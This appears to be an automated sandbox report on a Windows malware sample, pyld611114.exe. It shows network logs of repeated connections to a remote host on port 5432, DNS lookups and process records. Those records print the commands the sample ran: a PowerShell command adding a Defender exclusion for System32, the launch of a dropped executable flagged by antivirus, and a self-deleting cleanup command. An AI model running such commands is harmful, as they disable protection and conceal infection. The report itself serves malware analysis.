                                                                                          Dec 18, 2024 12:42:39.347877979 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:39.348057985 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.348081112 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.348210096 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.463949919 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.467808962 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:39.467842102 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:39.468187094 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:39.468241930 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.583580017 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:39.583672047 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.587555885 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.707076073 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:41.073641062 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:41.075195074 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:41.195044994 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:41.509718895 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:41.510320902 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:41.630062103 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.342282057 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.342340946 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.343163967 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:42.343472004 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:42.343571901 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:42.463004112 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.463105917 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.938572884 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.938798904 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:43.058382988 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:43.715152979 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:43.721895933 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:43.842820883 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:44.157272100 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:44.212469101 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:47.400814056 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:47.520508051 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:47.842900038 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:47.843179941 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:47.963773966 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:48.287323952 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:48.288255930 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:48.407850027 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:48.721496105 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:48.722384930 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:48.842741013 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:49.157434940 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:49.157875061 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:49.279716969 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:49.598628044 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:49.598855019 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:49.718475103 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:50.653745890 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:50.654016972 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:50.773665905 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:51.087081909 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:51.090922117 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:51.210603952 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:51.933934927 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:51.934129000 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.054053068 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.370892048 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.371345043 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.371345043 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.371403933 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.491110086 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.491154909 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.491472960 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.491525888 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.495276928 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.615042925 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.615171909 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.615257978 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.735086918 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:53.950826883 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:53.953365088 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:54.076425076 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:54.717971087 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:54.718395948 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:54.839328051 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.162337065 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.162620068 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.163043976 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:55.163340092 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:55.163425922 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:55.282838106 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.282893896 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.597613096 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.597835064 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:55.718334913 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:56.338890076 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:56.345834970 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:56.467343092 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:57.090965033 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:57.134340048 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:00.587950945 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:00.707530022 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.101466894 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.101741076 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:01.221292019 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.544727087 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.544970989 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:01.664536953 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.976273060 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.976666927 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:02.096165895 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:02.407957077 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:02.408699989 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:02.530149937 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:02.852850914 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:02.853260040 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:02.975722075 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:03.291920900 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:03.292207003 CET499915432192.168.2.6188.116.21.204
Dec 18, 2024 12:43:03.411739111 CET | 5432  | 49991 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:03.723712921 CET | 5432  | 49991 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:03.724625111 CET | 49991 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:03.848752975 CET | 5432  | 49991 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:04.160478115 CET | 5432  | 49991 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:04.160859108 CET | 49991 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:04.280760050 CET | 5432  | 49991 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:04.596484900 CET | 5432  | 49991 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:04.597002983 CET | 49991 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:04.597002983 CET | 49991 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:04.597193956 CET | 49991 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:04.713958025 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:04.716680050 CET | 5432  | 49991 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:04.716708899 CET | 5432  | 49991 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:04.717279911 CET | 5432  | 49991 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:04.717365026 CET | 49991 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:04.833687067 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:04.833863020 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:04.833982944 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:04.953495026 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:06.170770884 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:06.173499107 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:06.293075085 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:06.615339994 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:06.616164923 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:06.735837936 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:07.057146072 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:07.057166100 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:07.057233095 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:07.058022022 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:07.058104038 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:07.177664042 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:07.177678108 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:07.495874882 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:07.496105909 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:07.615607023 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:07.936724901 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:07.943465948 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:08.063173056 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:08.383373976 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:08.431231976 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:11.588212013 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:11.707832098 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:12.330030918 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:12.330352068 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:12.449857950 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:12.780035973 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:12.780249119 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:12.900298119 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:13.219211102 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:13.219417095 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:13.339428902 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:13.614006042 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:13.614228010 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:13.733784914 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:14.018635035 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:14.018870115 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:14.138768911 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:14.413700104 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:14.413917065 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:14.533534050 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:14.890944958 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:14.891156912 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:15.010716915 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:15.301410913 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:15.301651001 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:15.421432018 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:15.695507050 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:15.695776939 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:15.695776939 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:15.695899963 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:15.809390068 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:15.816459894 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:15.816484928 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:15.816874027 CET | 5432  | 50020 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:15.816920042 CET | 50020 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:15.930654049 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:15.930761099 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:15.930874109 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:16.050478935 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:17.178064108 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:17.179445982 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:17.299711943 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:17.572976112 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:17.573370934 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:17.693082094 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:17.967792988 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:17.967820883 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:17.967878103 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:17.968628883 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:17.968713045 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:18.088217020 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:18.088304043 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:18.361896038 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:18.415725946 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:18.685825109 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:18.808476925 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:19.083985090 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:19.090745926 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Dec 18, 2024 12:43:19.210251093 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:19.484534025 CET | 5432  | 50038 | 188.116.21.204 | 192.168.2.6
Dec 18, 2024 12:43:19.528800964 CET | 50038 | 5432  | 192.168.2.6    | 188.116.21.204
Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
Dec 18, 2024 12:41:45.604899883 CET | 63152       | 53        | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 12:41:45.742803097 CET | 53          | 63152     | 1.1.1.1     | 192.168.2.6
Dec 18, 2024 12:41:57.177160025 CET | 60099       | 53        | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 12:41:57.854649067 CET | 53          | 60099     | 1.1.1.1     | 192.168.2.6
Dec 18, 2024 12:42:03.762830019 CET | 54150       | 53        | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 12:42:03.899835110 CET | 53          | 54150     | 1.1.1.1     | 192.168.2.6
Dec 18, 2024 12:42:09.937596083 CET | 64860       | 53        | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 12:42:10.074666023 CET | 53          | 64860     | 1.1.1.1     | 192.168.2.6
Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name                      | Type           | Class       | DNS over HTTPS
Dec 18, 2024 12:41:45.604899883 CET | 192.168.2.6 | 1.1.1.1 | 0xdbee   | Standard query (0) | ipinfo.io                 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:41:57.177160025 CET | 192.168.2.6 | 1.1.1.1 | 0x9839   | Standard query (0) | runvrs.com                | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:42:03.762830019 CET | 192.168.2.6 | 1.1.1.1 | 0xea78   | Standard query (0) | github.com                | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:42:09.937596083 CET | 192.168.2.6 | 1.1.1.1 | 0x5cd0   | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code   | Name                        | CName                 | Address         | Type                   | Class       | DNS over HTTPS
Dec 18, 2024 12:41:07.109026909 CET | 1.1.1.1   | 192.168.2.6 | 0xae90   | No error (0) | fp2e7a.wpc.2be4.phicdn.net  | fp2e7a.wpc.phicdn.net | -               | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 12:41:07.109026909 CET | 1.1.1.1   | 192.168.2.6 | 0xae90   | No error (0) | fp2e7a.wpc.phicdn.net       | -                     | 192.229.221.95  | A (IP address)         | IN (0x0001) | false
Dec 18, 2024 12:41:09.602693081 CET | 1.1.1.1   | 192.168.2.6 | 0x6072   | No error (0) | bg.microsoft.map.fastly.net | -                     | 199.232.210.172 | A (IP address)         | IN (0x0001) | false
Dec 18, 2024 12:41:09.602693081 CET | 1.1.1.1   | 192.168.2.6 | 0x6072   | No error (0) | bg.microsoft.map.fastly.net | -                     | 199.232.214.172 | A (IP address)         | IN (0x0001) | false
Dec 18, 2024 12:41:45.742803097 CET | 1.1.1.1   | 192.168.2.6 | 0xdbee   | No error (0) | ipinfo.io                   | -                     | 34.117.59.81    | A (IP address)         | IN (0x0001) | false
Dec 18, 2024 12:41:57.854649067 CET | 1.1.1.1   | 192.168.2.6 | 0x9839   | No error (0) | runvrs.com                  | -                     | 188.116.21.204  | A (IP address)         | IN (0x0001) | false
Dec 18, 2024 12:42:03.899835110 CET | 1.1.1.1   | 192.168.2.6 | 0xea78   | No error (0) | github.com                  | -                     | 20.233.83.145   | A (IP address)         | IN (0x0001) | false
Dec 18, 2024 12:42:10.074666023 CET | 1.1.1.1   | 192.168.2.6 | 0x5cd0   | No error (0) | raw.githubusercontent.com   | -                     | 185.199.110.133 | A (IP address)         | IN (0x0001) | false
Dec 18, 2024 12:42:10.074666023 CET | 1.1.1.1   | 192.168.2.6 | 0x5cd0   | No error (0) | raw.githubusercontent.com   | -                     | 185.199.108.133 | A (IP address)         | IN (0x0001) | false
Dec 18, 2024 12:42:10.074666023 CET | 1.1.1.1   | 192.168.2.6 | 0x5cd0   | No error (0) | raw.githubusercontent.com   | -                     | 185.199.109.133 | A (IP address)         | IN (0x0001) | false
Dec 18, 2024 12:42:10.074666023 CET | 1.1.1.1   | 192.168.2.6 | 0x5cd0   | No error (0) | raw.githubusercontent.com   | -                     | 185.199.111.133 | A (IP address)         | IN (0x0001) | false


                                                                                          Target ID:0
                                                                                          Start time:06:41:12
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Users\user\Desktop\pyld611114.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\pyld611114.exe"
                                                                                          Imagebase:0x7ff668320000
                                                                                          File size:15'180'800 bytes
                                                                                          MD5 hash:43BCE45D873189F9AE2767D89A1C46E0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:06:41:15
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:06:41:15
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:06:41:16
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:10
                                                                                          Start time:06:41:28
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:06:41:28
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:06:41:28
Start date: 18/12/2024
Path: C:\Windows\System32\usvcinsta64.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\usvcinsta64.exe"
Imagebase: 0x7ff792960000
File size: 14'693'888 bytes
MD5 hash: 11DDC0A34BAC7AB099D2EE8D9817BF58
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 83%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 13
Start time: 06:41:29
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld611114.exe"
Imagebase: 0x7ff7d3130000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 06:41:29
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
